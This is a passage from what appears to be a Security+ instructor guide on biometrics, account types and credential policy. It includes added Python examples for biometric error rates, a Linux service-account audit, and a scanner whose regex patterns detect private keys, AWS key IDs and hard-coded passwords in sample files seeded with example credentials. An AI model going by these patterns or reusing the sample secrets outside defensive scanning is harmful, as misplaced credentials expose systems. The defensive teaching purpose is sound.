• Cost/implementation: some scanner types are more expensive, whereas others are not easy to incorporate on mobile devices.

• Users can find it intrusive and threatening to privacy.

• The technology can be discriminatory or inaccessible to those with disabilities.
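The relationship between the threshold, FRR, FAR, and CER is easiest to see by sweeping a threshold over recorded comparison scores. The following is an added example for this page, not code from the Instructor Guide or from any biometric product. The genuine and impostor scores are a constructed illustration (ten comparisons each, on a 0 to 1 similarity scale), not data from a real sensor; the functions work unchanged on a real score export.

```python
# Added example: compute FRR, FAR and the crossover error rate (CER) by sweeping a matching
# threshold over genuine and impostor comparison scores. The scores below are a constructed
# illustration, not data from any real sensor, and this is not code from the Instructor Guide.

# Constructed similarity scores in [0, 1]: higher means the probe looks more like the template.
GENUINE_SCORES = [0.91, 0.88, 0.79, 0.83, 0.95, 0.72, 0.86, 0.68, 0.90, 0.81]   # same person re-scanned
IMPOSTOR_SCORES = [0.35, 0.52, 0.41, 0.66, 0.28, 0.58, 0.73, 0.44, 0.39, 0.61]  # different people


def frr(threshold, genuine=GENUINE_SCORES):
    """False Rejection Rate (Type I): legitimate users whose score falls below the threshold."""
    return sum(s < threshold for s in genuine) / len(genuine)


def far(threshold, impostors=IMPOSTOR_SCORES):
    """False Acceptance Rate (Type II): impostors whose score reaches the threshold."""
    return sum(s >= threshold for s in impostors) / len(impostors)


def crossover(genuine=GENUINE_SCORES, impostors=IMPOSTOR_SCORES, steps=1000):
    """Sweep the threshold from 0 to 1 and return (threshold, cer) where FAR and FRR are
    closest. A lower CER means the two score distributions overlap less."""
    best = None
    for i in range(steps + 1):
        t = i / steps
        a, r = far(t, impostors), frr(t, genuine)
        gap = abs(a - r)
        if best is None or gap < best[0]:
            best = (gap, t, (a + r) / 2)
    return best[1], best[2]


def threshold_for_far(max_far, impostors=IMPOSTOR_SCORES, steps=1000):
    """Deployment tuning: the lowest threshold that keeps FAR at or below a target,
    accepting whatever FRR results. A data-center door would be tuned this way, not at the CER."""
    for i in range(steps + 1):
        t = i / steps
        if far(t, impostors) <= max_far:
            return t
    return 1.0


if __name__ == "__main__":
    t, cer = crossover()
    print(f"CER {cer:.0%} at threshold {t:.3f}")
    strict = threshold_for_far(0.0)
    print(f"FAR 0% needs threshold {strict:.3f}, giving FRR {frr(strict):.0%}")
```

With the constructed scores the crossover sits at a threshold just above 0.68 with both error rates at 10%, while driving FAR to zero requires a threshold above 0.73 and raises FRR to 20%. That trade-off is the decision a deployment actually makes.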

Show Slide(s): Fingerprint Recognition

Fingerprint Recognition
Physiologic biometric features represent a "something you are" factor. They include fingerprint patterns, iris or retina recognition, or facial recognition.

Fingerprint recognition is the most widely implemented biometric authentication method. The technology required for scanning and recording fingerprints is relatively inexpensive and the process quite straightforward. A fingerprint sensor is usually implemented as a small capacitive cell that can detect the unique pattern of ridges making up the fingerprint. The technology is also non-intrusive and relatively simple to use, although moisture or dirt can prevent readings.

Configuring fingerprint recognition on an Android smartphone. (Android is a trademark of Google LLC.)

The main problem with fingerprint scanners is that it is possible to obtain a copy of a user's fingerprint and create a mold of it that will fool the scanner (tomsguide.com/us/iphone-touch-id-hack,news-….html). Liveness checks (for skin conductivity, temperature, or pulse) are the usual countermeasure on conventional scanners. These concerns are more fully addressed by vein matching scanners, or vascular biometrics. This requires a more complex scanner (an infrared light source and camera) to create a template from the unique pattern of blood vessels in a person's finger or palm.


Show Slide(s): Facial Recognition

Facial Recognition
Facial recognition records multiple indicators about the size and shape of the face, like the distance between each eye, or the width and length of the nose. The initial pattern must be recorded under optimum lighting conditions; depending on the technology, this can be a lengthy process. Again, this technology is very much associated with law enforcement, and is the most likely to make users uncomfortable about the personal privacy issues. Facial recognition suffers from relatively high false acceptance and rejection rates and can be vulnerable to spoofing with a photograph or video unless the sensor adds depth or infrared imaging. Much of the technology development is in surveillance, rather than for authentication, although it is becoming a popular method for use with smartphones.

The limitations of facial recognition can be overcome by scanning more detailed features of the eye:

• Retinal scan: an infrared light is shone into the eye to identify the pattern of blood vessels. The arrangement of these blood vessels is highly complex and typically does not change from birth to death, except in the event of certain diseases or injuries. Retinal scanning is therefore one of the most accurate forms of biometrics. Retinal patterns are very secure, but the equipment required is expensive and the process is relatively intrusive and complex. False negatives can be produced by disease, such as cataracts.

A retinal scan uses an infrared light to identify the pattern of blood vessels in the eye. (Photo by Ghost Presenter on Unsplash.)

• Iris scan: matches patterns on the surface of the eye using near-infrared imaging and so is less intrusive than retinal scanning (the subject can continue to wear glasses, for instance) and a lot quicker. Iris scanners offer a similar level of accuracy as retinal scanners but are much less likely to be affected by diseases. Iris scanning is the technology most likely to be rolled out for high-volume applications, such as airport security. There is a chance that an iris scanner could be fooled by a high-resolution photo of someone's eye.

Show Slide(s): Behavioral Technologies

Behavioral Technologies
"Something you do" refers to behavioral biometric pattern recognition. Rather than scan some attribute of your body, a template is created by analyzing a behavior, such as typing, writing a signature, or walking/moving. The variations in motion, pressure, or gait are supposed to uniquely verify each individual. In practice, however, these methods are subject to higher error rates, and are much more troublesome for a subject to perform.


• Voice recognition: relatively cheap, as the hardware and software required are built into many standard PCs and mobiles. However, obtaining an accurate template can be difficult and time-consuming. Background noise and other environmental factors can also interfere with logon. Voice is also subject to impersonation, including by recorded or synthesized speech.

• Gait analysis: produces a template from human movement (locomotion). The technologies can either be camera-based or use smartphone features, such as an accelerometer and gyroscope.

• Signature recognition: signatures are relatively easy to duplicate, but it is more difficult to fake the actual signing process. Signature matching records the user applying their signature (stroke, speed, and pressure of the stylus).

• Typing: matches the speed and pattern of a user's input of a passphrase.

Some biometric and behavioral technologies might be used for purposes other than logon authentication:

• Biometric identification refers to matching people to a database, as opposed to authenticating them per se. For example, if an individual crossing the floor of the data center does not produce a match for gait analysis, the system may raise a security alert (g4s.com/en-us/media/news, "Keeping Data Centers Secure").

• Continuous authentication verifies that the user who logged on is still operating the device. For example, if a user successfully authenticates to a smartphone using a fingerprint, the device continues to monitor key motion and pressure statistics as the device is held and manipulated. If this deviates from the baseline, the detection system would lock the phone. This sort of technology is not available on the market (at the time of writing), but it is the subject of numerous research projects.


Review Activity:
Biometrics Authentication Concepts
Answer the following questions:

1. Apart from cost, what would you consider to be the major considerations for evaluating a biometric recognition technology?

Error rates (false acceptance and false rejection), throughput, and whether users will accept the technology or reject it as too intrusive or threatening to privacy.

2. How is a fingerprint reader typically implemented as hardware?

As a capacitive cell.

3. Which type of eye recognition is easier to perform: retinal or iris scanning?

Iris scans are simpler.

4. What two ways can biometric technologies be used other than for logon authentication?

For identification based on biometric features and in continuous authentication mechanisms.


Lesson 7
Summary

Teaching Tip: Check that students are confident about the content that has been covered. If there is time, revisit any content examples that they have questions about. If you have used all the available time for this lesson block, note the issues and schedule time for a review later in the course.

You should be able to assess the design and use of authentication products for on-premises networks, web/cloud apps, and physical security in terms of meeting confidentiality, integrity, and availability requirements. Given a product-specific setup guide, you should be able to implement protocols and technologies such as Kerberos, smart-card authentication, and EAP/RADIUS. You should also be able to identify signs of and risks from password attacks.

Interaction Opportunity: Optionally, discuss with students what authentication technologies are used in their workplaces. Do students have any experience of advantages or disadvantages of smart cards or biometric technologies? Is there single sign-on across local networks and cloud services, and if so, how is this implemented?

Guidelines for Implementing Authentication Controls

Follow these guidelines when you implement authentication controls:

• Assess the design requirements for confidentiality, integrity, and availability given the context for the authentication solution (private network, public web, VPN gateway, or physical site premises, for instance).

• Determine whether multifactor authentication (MFA) is required, and which hardware token or biometric technologies would meet the requirement when combined with a knowledge factor:

  • Ownership factors include smart cards, OTP keys/fobs, or OTP authenticator apps installed to a trusted device.

  • Biometric technologies include fingerprint, face, iris, retina, voice, and vein, with efficacy determined by metrics such as FAR, FRR, CER, speed, and accessibility.

  • 2-step verification can provide an additional token to a trusted device or account via SMS, phone call, email, or push notification.

  • Vaults and keys (wireless fobs) can provide better security for password authentication.

• Select an appropriate authentication protocol or framework:

  • Kerberos for sign-in to local networks with support for smart-card authentication.

  • 802.1X/EAP/RADIUS for authentication at a network access device, with support for smart-card authentication or secure transmission of user credentials.

  • TACACS+ for administration of network appliances.

• Assess risks from password attacks, especially when using legacy protocols (PAP and CHAP) and where hashes are exposed to capture.

Lesson 8
Implementing Identity and Account
Management Controls

LESSON INTRODUCTION

Teaching Tip: This lesson collects the objectives and content examples for identity management, privilege/personnel policies, and permissions/access control.

As well as ensuring that only valid users and devices connect to managed networks and devices, you must ensure that these subjects are authorized with only necessary permissions and privileges to access and change resources. These tasks are complicated by the need to manage identities across on-premises networks and cloud services. Also, account security depends on effective organizational policies for personnel and security training. You will often be involved in shaping and updating these policies in line with best practice, as well as delivering security awareness education and training programs.

Lesson Objectives
In this lesson, you will:

• Implement identity and account types.

• Implement account policies.

• Implement authorization solutions.

• Explain the importance of personnel policies.


Topic 8A
Implement Identity and Account Types

EXAM OBJECTIVES COVERED
3.7 Given a scenario, implement identity and account management controls
5.3 Explain the importance of policies to organizational security

Teaching Tip: This topic looks at policies that ensure least privilege and govern the account provisioning process.

Least privilege is the principle at the heart of most organizational security policies. Identity and privilege management helps an organization to account for the actions of both regular and administrative users. These systems are complicated by the presence of default, shared, guest, and device account types that are difficult to associate with a single identity.

Show Slide(s): Identity Management Controls

Teaching Tip: Recap the way that an account (user or computer) can be securely associated with a digital ID, which can be used for single sign-on to multiple services. We will return to federated identity management in more detail later in the lesson.

Identity Management Controls
On a private network, a digital identity can be represented by an account. The network administrator ensures the integrity of the server hosting the accounts, while each user is responsible for protecting the credentials so that only they can authenticate to the account and use it. On public networks and as an extra layer of protection on private networks, the account may also be identified by some cryptographic material.

Certificates and Smart Cards
Public key infrastructure (PKI) allows the management of digital identities, where a certificate authority (CA) issues certificates to validated subjects (users and servers). The subject identity can be trusted by any third party that also trusts the CA.

The certificate contains the subject's public key and is signed using the CA's private key. The CA's public key, distributed in the CA's own certificate, allows third parties to verify that signature and therefore to trust the subject's public key. The subject's public key is part of a pair with a linked private key. The private key must be kept secret. It can be stored on the computer, either in the file system or in a trusted platform module (TPM) chip. Alternatively, a user's certificate and private key can be stored on a smart card or USB key and used to authenticate to different PCs and mobile devices.

Tokens
It is inconvenient for users to authenticate to each application they need to use. In a single sign-on system, the user authenticates to an identity provider (IdP) and receives a cryptographic token. The user can present that token to compatible applications as proof they are authenticated, and receive authorizations from the application. With a token, there is always a risk that a malicious actor will be able to capture and replay it. The application protocol that makes use of tokens must be designed to resist this type of attack, typically by giving tokens a short lifetime, scoping them to a specific audience, and transmitting them only over TLS.

Identity Providers
The identity provider is the service that provisions the user account and processes authentication requests. On a private network, these identity directories and application authorization services can be operated locally. The same site operates both identity provision and application provision. Most networks now make use of third-party cloud services, however. In this scenario, various protocols and frameworks are available to implement federated identity management across web-based services. This means that a user can create a digital identity with one provider, but other sites can use that identity to authorize use of an application.

Show Slide(s): Background Check and Onboarding Policies

Teaching Tip: Explain how account and privilege policies apply to job roles, facilitated at least partly by HR. These written policies are then expressed as technical controls, such as network accounts and permissions assignments.

Background Check and Onboarding Policies
Identity and access management (IAM) involves both IT security procedures and technologies and Human Resources (HR) policies. Personnel management policies are applied in three phases:

• Recruitment (hiring): locating and selecting people to work in particular job roles. Security issues here include screening candidates and performing background checks.

• Operation (working): it is often the HR department that manages the communication of policy and training to employees (though there may be a separate training and personal development department within larger organizations). As such, it is critical that HR managers devise training programs that communicate the importance of security to employees.

• Termination or separation (firing or retiring): whether an employee leaves voluntarily or involuntarily, termination is a difficult process, with numerous security implications.

Background Check
A background check determines that a person is who they say they are and is not concealing criminal activity, bankruptcy, or connections that would make them unsuitable or risky. Employees working in high-confidentiality environments or with access to high-value transactions will obviously need to be subjected to a greater degree of scrutiny. For some jobs, especially federal jobs requiring a security clearance, background checks are mandatory. Some background checks are performed internally, whereas others are done by an external third party.

Onboarding
Onboarding at the HR level is the process of welcoming a new employee to the organization. The same sort of principle applies to taking on new suppliers or contractors. Some of the same checks and processes are used in creating customer and guest accounts. As part of onboarding, the IT and HR function will combine to create an account for the user to access the computer system, assign the appropriate privileges, and ensure the account credentials are known only to the valid user. These functions must be integrated, to avoid creating accidental configuration vulnerabilities, such as IT creating an account for an employee who is never actually hired. Some of the other tasks and processes involved in onboarding include:

• Secure transmission of credentials: creating and sending an initial password or issuing a smart card securely. The process needs protection against rogue administrative staff. Newly created accounts with simple or default passwords are an easily exploitable backdoor, so the initial password should be random, delivered out of band, and forced to change at first logon.

• Asset allocation: provision computers or mobile devices for the user or agree to the use of bring-your-own-device handsets.

• Training/policies: schedule appropriate security awareness and role-relevant training and certification.


Non-Disclosure Agreement (NDA)

The terms of a non-disclosure agreement (NDA) might be incorporated within the employee contract or could be a separate document. When an employee or contractor signs an NDA, they are asserting that they will not share confidential information with a third party.

Show Slide(s): Personnel Policies for Privilege Management

Teaching Tip: Make sure students understand what each policy entails and how they reduce risks from insider threat and account compromise.

Personnel Policies for Privilege Management
HR and IT must collaborate to ensure effective privilege management. These policies aim to ensure that the risk of insider threat is minimized.

Separation of Duties
Separation of duties is a means of establishing checks and balances against the possibility that critical systems or procedures can be compromised by insider threats. Duties and responsibilities should be divided among individuals to prevent ethical conflicts or abuse of powers.

An employee is supposed to work for the interests of their organization exclusively. A situation where someone can act in his or her own interest, personally, or in the interests of a third party is said to be a conflict of interest.

Separation of duties means that employees must be constrained by security policies:

• Standard operating procedures (SOPs) mean that an employee has no excuse for not following protocol in terms of performing these types of critical operations.

• Shared authority means that no one user is able to action or enable changes on his or her own authority. At least two people must authorize the change. One example is separating responsibility for purchasing (ordering) from that of authorizing payment. Another is that a request to create an account should be subject to approval and oversight.

Separation of duties does not completely eliminate risk because there is still the chance of collusion between two or more people. This, however, is a much less likely occurrence than a single rogue employee.

Least Privilege
Least privilege means that a user is granted sufficient rights to perform his or her job and no more. This mitigates risk if the account should be compromised and fall under the control of a threat actor. Authorization creep refers to a situation where a user acquires more and more rights, either directly or by being added to security groups and roles. Least privilege should be ensured by closely analyzing business workflows to assess what privileges are required and by performing regular account audits that compare each account's actual group memberships and permissions against its role.

Job Rotation
Job rotation (or rotation of duties) means that no one person is permitted to remain in the same job for an extended period. For example, managers may be moved to different departments periodically, or employees may perform more than one job role, switching between them throughout the year. Rotating individuals into and out of roles, such as the firewall administrator or access control specialist, helps an organization ensure that it is not tied too firmly to any one individual because vital institutional knowledge is spread among trusted employees. Job rotation also helps prevent abuse of power, reduces boredom, and enhances individuals' professional skills.

Lesson 8: Implementing Identity and Account Management Controls | Topic 8A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 183

Mandatory Vacation
Mandatory vacation means that employees are forced to take their vacation time,
during which someone else fulfills their duties. The typical mandatory vacation policy
requires that employees take at least one vacation a year in a full week increment
so that they are away from work for at least five days in a row. During that time, the
corporate audit and security employees have time to investigate and discover any
discrepancies in employee activity.

Offboarding Policies

An exit interview (or offboarding) is the process of ensuring that an employee leaves a
company gracefully. Offboarding is also used when a project using contractors or third
parties ends. In terms of security, there are several processes that must be completed:

• Account management: disable the user account and privileges. Ensure that
any information assets created or managed by the employee but owned by the
company are accessible (in terms of encryption keys or password-protected files).

• Company assets: retrieve mobile devices, keys, smart cards, media, and so
on. The employee will need to confirm (and in some cases prove) that they have not
retained copies of any information assets.

• Personal assets: wipe employee-owned devices of corporate data and applications.
The employee may also be allowed to retain some information assets (such as
personal emails or contact information), depending on the policies in force.

The departure of some types of employees should trigger additional processes to
re-secure network systems. Examples include employees with detailed knowledge of
security systems and procedures, and access to shared or generic account credentials.
These credentials must be changed immediately.

Show Slide(s): Offboarding Policies

Interaction Opportunity: Ask students if they have experienced situations where
ex-employees have caused security issues. The Capital One breach is a classic case
study (krebsonsecurity.com/tag/capital-one-breach).

Security Account Types and Credential Management

Operating systems, network appliances, and network directory products use some
standard account types as the basis of a privilege management system. These include
standard user, administrative user, security group accounts, and service accounts.
Standard users have limited privileges, typically with access to run programs and to
create and modify files belonging only to their profile.

Credential Management Policies for Personnel

Improper credential management continues to be one of the most fruitful vectors
for network attacks. If an organization must continue to rely on password-based
credentials, its usage needs to be governed by strong policies and training.

A password policy instructs users on best practice in choosing and maintaining
passwords. More generally, a credential management policy should instruct users on
how to keep their authentication method secure, whether this be a password, smart
card, or biometric ID. Password protection policies mitigate against the risk of attackers
being able to compromise an account and use it to launch other attacks on the
network. The credential management policy also needs to alert users to diverse types
of social engineering attacks. Users need to be able to spot phishing and pharming
attempts, so that they do not enter credentials into an unsecure form or spoofed site.

Guest Accounts

A guest account is a special type of shared account with no password. It allows
anonymous and unauthenticated access to a resource. The Windows OS creates guest
user and group accounts when installed, but the guest user account is disabled by
default. Guest accounts are also created when installing web services, as most web
servers allow unauthenticated access.

Show Slide(s): Security Account Types and Credential Management

Teaching Tip: This content is merging the account types content examples from
objective 3.7 with the credential policies content examples from objective 5.3.
This topic is focused on management/operational controls. We will cover technical
account policy controls in the next topic.

Security Group-Based Privileges

As well as an account to use resources on the local computer, users also typically
need accounts to use resources on the network. In fact, most accounts are created
on a network directory and then given permission to log in on certain computer or
workstation objects.

One approach to network privilege management is to assign privileges directly to
user accounts. This model is only practical if the number of users is small. With a large
number of users, it is difficult to audit and to apply privilege policies consistently.

The concept of a security group account simplifies and centralizes the administrative
process of assigning rights. Rather than assigning rights directly, the system owner
assigns them to security group accounts. User accounts gain rights by being made
a member of a security group. A user can be a member of multiple groups and can
therefore receive rights and permissions from several sources.

Show Slide(s): Security Group-Based Privileges

Teaching Tip: Make sure students understand the reasons for using security groups.

Using security groups to assign privileges. (Images © 123RF.com.)

Administrator/Root Accounts

Administrative or privileged accounts are able to install and remove apps and device
drivers, change system-level settings, and access any object in the file system. Ideally,
only accounts that have been created and assigned specific permissions should have
this kind of elevated privilege. In practice, it is very hard to eliminate the presence
of default administrator accounts. A default account is one that is created by the
operating system or application when it is installed. The default account has every
permission available. In Windows, this account is called Administrator; in Linux, it is
called root. This type of account is also referred to as a superuser.

Show Slide(s): Administrator/Root Accounts

Teaching Tip: Make sure students understand the difference between privileged accounts
and generic default administrator/root/superuser accounts. Also note that these
accounts obtain rights from default security groups. For example, in Windows the
"Administrator" account is disabled by default, but the account created during
installation is automatically added to the "Administrators" security group, and so has
exactly the same permissions.


Generic Administrator Account Management

Superuser accounts directly contradict the principles of least privilege and separation
of duties. Consequently, superuser accounts should be prohibited from logging on
in normal circumstances. The default superuser account should be restricted to
disaster recovery operations only. In Windows, the account is usually disabled by
default and can be further restricted using group policy (docs.microsoft.com/en-us/
windows-server/identity/ad-ds/plan/security-best-practices/appendix-h--securing-local-
administrator-accounts-and-groups). The first user account created during setup has
superuser permissions, however.

On Windows networks, you also need to distinguish between local administrators and
domain administrators. The scope of a local administrator's privileges is restricted to the
machine hosting the account. Domain administrators can have privileges over any machine
joined to the domain.

Ubuntu Linux follows a similar approach: the root account is configured with no
password and locked, preventing login. An alternate superuser account is created
during setup. In other Linux distributions, a password is usually set at install time. This
password must be kept as securely as is possible.

Administrator Credential Policies

The default superuser should be replaced with one or more named accounts with
sufficient elevated privileges for a given job role. This can be referred to as generic
account prohibition. It means that administrative activity can be audited and the
system as a whole conforms to the property of non-repudiation.

It is a good idea to restrict the number of administrative accounts as much as possible. The
more accounts there are, the more likely it is that one of them will be compromised. On
the other hand, you do not want administrators to share accounts, as that compromises
accountability.

Users with administrative privileges must take the greatest care with credential
management. Privileged-access accounts must use strong passwords and ideally
multifactor authentication (MFA).

Default Security Groups

Most operating systems also create default security groups, with a default set of
permissions. In Windows, privileges are assigned to local group accounts (the Users
and Administrators groups) rather than directly to user accounts. Custom security
groups with different permissions can be created to enforce the principle of least
privilege. In Linux, privileged accounts are typically configured by adding either a user
or a group account to the /etc/sudoers file (linux.com/training-tutorials/start-fine-
tuning-sudo-linux).

Service Accounts

Show Slide(s): Service Accounts

Service accounts are used by scheduled processes and application server software, such
as databases. Windows has several default service account types. These do not accept
user interactive logons but can be used to run processes and background services:

• System has the most privileges of any Windows account. The local system account
creates the host processes that start Windows before the user logs on. Any process
created using the system account will have full privileges over the local computer.

• Local Service has the same privileges as the standard user account. It can only
access network resources as an anonymous user.


• Network Service has the same privileges as the standard user account but can
present the computer's account credentials when accessing network resources.

Configuring the credentials for a service running on Windows Server. This service is using the local
system account. This account has full local administrator privileges.
(Screenshot used with permission from Microsoft.)

Linux also uses the concept of service accounts to run non-interactive daemon
processes, such as web servers and databases. These accounts are usually created by
the server application package manager. Users can be prevented from logging into
these accounts (often by setting the password to an unknown value and denying shell
access).

If a named account is manually configured to run a service, the password for the
service account will effectively be shared by multiple administrators. Many operating
systems support automatic provisioning of credentials for service accounts, reducing
the risk of insider threat (techcommunity.microsoft.com/t5/ask-the-directory-services-
team/managed-service-accounts-understanding-implementing-best/ba-p/397009).

Be aware of the risk of using a personal account when a service account is appropriate. If
you use a personal account and the user changes the password or the account is disabled
for some reason, then the service will fail to run, which can cause serious problems with
business applications.
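The two Linux controls described above (a shell that refuses logon and a locked password field in /etc/shadow) can be checked mechanically during an account audit. The following Python script is an added example, not code from the CompTIA guide: it parses constructed /etc/passwd and /etc/shadow records and reports system accounts that can still be logged in to. The UID cut-off of 1000 for "system" accounts and the set of nologin shell paths are assumptions that vary by distribution.

```python
"""Audit Linux service accounts from /etc/passwd and /etc/shadow records.

Added example (not from the CompTIA guide). Flags daemon accounts whose
shell is interactive or whose shadow password field is not locked
('!' or '*'). The sample records below are constructed for the demo;
on a real host read the two files instead (shadow needs root).
"""

# Assumption: usual nologin shells on Debian/RHEL-style builds.
NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false"}

# Constructed sample records (same field layout as the real files).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
postgres:x:112:120:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
"""

SAMPLE_SHADOW = """\
root:!:19000:0:99999:7:::
www-data:*:19000:0:99999:7:::
postgres:$6$saltsalt$hashhashhash:19000:0:99999:7:::
backup:$6$anothersalt$anotherhash:19000:0:99999:7:::
alice:$6$usersalt$userhash:19000:0:99999:7:::
"""


def parse_colon_file(text):
    """Return {name: [fields]} for a passwd- or shadow-style file."""
    records = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        records[fields[0]] = fields
    return records


def is_locked(shadow_hash):
    """A shadow password field that is empty or starts with '!' or '*'
    cannot be used for password authentication."""
    return shadow_hash == "" or shadow_hash[0] in "!*"


def audit_service_accounts(passwd_text, shadow_text, uid_max=1000):
    """Return (account, finding) tuples for system accounts (UID below
    uid_max, excluding root) that are still interactively usable."""
    passwd = parse_colon_file(passwd_text)
    shadow = parse_colon_file(shadow_text)
    findings = []
    for name, fields in passwd.items():
        uid, shell = int(fields[2]), fields[6]
        if name == "root" or uid >= uid_max:
            continue  # root and ordinary users are out of scope here
        if shell not in NOLOGIN_SHELLS:
            findings.append((name, "interactive shell " + shell))
        pw_field = shadow.get(name, [name, "!"])[1]
        if not is_locked(pw_field):
            findings.append((name, "password hash set, account not locked"))
    return findings


def audit_root(shadow_text):
    """True if root's password is locked (the Ubuntu default)."""
    return is_locked(parse_colon_file(shadow_text)["root"][1])


if __name__ == "__main__":
    for account, finding in audit_service_accounts(SAMPLE_PASSWD, SAMPLE_SHADOW):
        print(f"{account}: {finding}")
    print("root password locked:", audit_root(SAMPLE_SHADOW))
```

On the constructed sample the script reports postgres twice (interactive shell and an unlocked hash) and backup once (its shell is fine, but a password has been set, so the credential is shareable); www-data passes both checks.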

Shared/Generic/Device Accounts and Credentials

A shared account is one where passwords or other authentication credentials are
known to more than one person. Typically, simple SOHO networking devices do not
allow for the creation of multiple accounts and a single Admin account is used to
manage the device. These accounts might be configured with a default password.
Other examples include the default (or generic) accounts, such as Administrator
and Guest in Windows or root in Linux, or accounts added to default security groups.
Shared accounts may also be set up for temporary staff.

A shared account breaks the principle of non-repudiation and makes an accurate audit
trail difficult to establish. It makes it more likely that the password for the account will
be compromised. The other major risk involves password changes to an account. Since
frequent password changing is a common policy, organizations will need to ensure that
everyone who has access to an account knows when the password will change, and
what that new password will be. This necessitates distributing passwords to a large
group of people, which itself poses a significant challenge to security. Shared accounts
should only be used where these risks are understood and accepted.

Show Slide(s): Shared/Generic/Device Accounts and Credentials


Credential Policies for Devices

Network appliances designed for enterprise use are unlikely to be restricted to a
single default account, and will use TACACS+ to support individual accounts and role-
based permissions. If a device can only be operated with a shared password, ensure
separation of duties to ensure the device remains in an authorized configuration.

Privilege Access Management

Even with the most carefully designed role-based permissions, it is almost impossible
to eliminate use of shared device root passwords completely. Enterprise privilege
access management (PAM) products provide a solution for storing these high-risk
credentials somewhere other than a spreadsheet and for auditing elevated privileges
generally (gartner.com/reviews/market/privileged-access-management).

Secure Shell Keys and Third-Party Credentials

Secure Shell (SSH) is a widely used remote access protocol. It is very likely to be used to
manage devices and services. SSH uses two types of key pairs:

• A host key pair identifies an SSH server. The server reveals the public part when a
client connects to it. The client must use some means of determining the validity of
this public key. If accepted, the host key authenticates the key exchange that sets up
the encrypted session.

• A user key pair is a means for a client to log in to an SSH server. The server stores a
copy of the client's public key. The client uses the linked private key to sign an
authentication request and sends the request (not the private key) to the server.
The server can only validate this request if the correct public key is held for that
client.

SSH keys have often not been managed very well, leading to numerous security
breaches, most infamously the Sony hack (ssh.com/malware). There are vendor
solutions for SSH key management or you can configure servers and clients to use
public key infrastructure (PKI) and certificate authorities (CAs) to validate identities.

A third-party credential is one used by your company to manage a vendor service or
cloud app. As well as administrative logons, devices and services may be configured
with a password or cryptographic keys to access hosts via SSH or via an application
programming interface (API). Improper management of these secrets, such as
including them in code or scripts as plaintext, has been the cause of many breaches
(nakedsecurity.sophos.com, "Thousands of coders are leaving their crown jewels
exposed on GitHub").

Show Slide(s): Secure Shell Keys and Third-Party Credentials
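The secrets this paragraph and the SSH section warn about (private keys, cloud access keys, hard-coded passwords) leak most often through source and configuration files, so a pre-commit or repository scan is the practical control. The Python below is an added example, not code from the CompTIA guide or from any scanning product: it runs a few pattern checks over constructed file contents and skips values that are only placeholders. The PEM header and the AWS "AKIA"/"ASIA" key-ID prefixes are assumptions drawn from the public formats; the password pattern is this example's own heuristic and will need tuning for a real estate.

```python
"""Scan source and config text for plaintext credentials.

Added example (not from the CompTIA guide). Detects private-key blocks,
AWS access key IDs and hard-coded password assignments in text, ignoring
placeholder values such as "${DB_PASSWORD}". The sample files are
constructed for the demonstration; the key ID is AWS's documented
example value, not a live credential.
"""
import re

# (name, pattern). Assumption: these prefixes/headers are stable enough
# to match on; they are a starting point, not an exhaustive catalogue.
SECRET_PATTERNS = [
    ("private_key_block",
     re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH |DSA )?PRIVATE KEY-----")),
    ("aws_access_key_id",
     re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b")),
    ("hardcoded_password",
     re.compile(r"""(?i)(?:password|passwd|pwd)\s*[=:]\s*['"]([^'"]{4,})['"]""")),
]

# Values that are references, not literal secrets.
PLACEHOLDER_PREFIXES = ("$", "{", "<", "%")

# Constructed sample: what a careless commit might contain.
SAMPLE_FILES = {
    "deploy.sh": """\
#!/bin/sh
AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
export DB_PASSWORD='Sup3rS3cret!'
aws s3 sync ./build s3://my-bucket
""",
    "id_rsa": """\
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAAB...
-----END OPENSSH PRIVATE KEY-----
""",
    "README.md": """\
Set DB_PASSWORD in your environment; never commit it.
Example placeholder: password = "${DB_PASSWORD}"
""",
}


def scan_text(name, text):
    """Return [(file, line_no, pattern_name)] for each secret-looking line."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for pattern_name, pattern in SECRET_PATTERNS:
            match = pattern.search(line)
            if not match:
                continue
            value = match.group(1) if match.groups() else None
            if value is not None and value.lstrip().startswith(PLACEHOLDER_PREFIXES):
                continue  # variable reference or template, not a literal secret
            hits.append((name, line_no, pattern_name))
    return hits


def scan_files(files):
    """Scan a {filename: contents} mapping; hits are ordered by file name."""
    hits = []
    for name in sorted(files):
        hits.extend(scan_text(name, files[name]))
    return hits


if __name__ == "__main__":
    for hit in scan_files(SAMPLE_FILES):
        print("%s:%d: possible %s" % hit)
```

A scanner like this belongs in a pre-commit hook or CI job so that the finding blocks the push rather than being discovered by a third party later; a hit on a real key should be treated as a compromise and the key rotated, because removing it from the history does not un-publish it.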


Security credentials for an account on Amazon Web Services (AWS). The user can authenticate with a
password credential, or use an access key within a script. The secret part of the access key is shown
only when it is created and cannot be retrieved via the console afterwards. It can be disabled or
deleted, however.


Review Activity:
Identity and Account Types
Answer the following questions:

1. You are consulting with a company about a new approach to authenticating
users. You suggest there could be cost savings and better support for
multifactor authentication (MFA) if your employees create accounts with a
cloud provider. That allows the company's staff to focus on authorizations
and privilege management. What type of service is the cloud vendor
performing?

The cloud vendor is acting as the identity provider.

2. What is the process of ensuring accounts are only created for valid users,
only assigned the appropriate privileges, and that the account credentials
are known only to the valid user?

Onboarding.

3. What is the policy that states users should be allocated the minimum
sufficient permissions?

Least privilege.

4. What is a SOP?

A standard operating procedure is a step-by-step listing of the actions that must
be completed for any given task.

5. What type of organizational policies ensure that at least two people have
oversight of a critical business process?

Shared authority, job rotation, and mandatory enforced vacation/holidays.

6. Recently, attackers were able to compromise the account of a user whose
employment had been terminated a week earlier. They used this account
to access a network share and delete important files. What account
vulnerability enabled this attack?

While it's possible that lax password requirements and incorrect privileges may
have contributed to the account compromise, the most glaring problem is that the
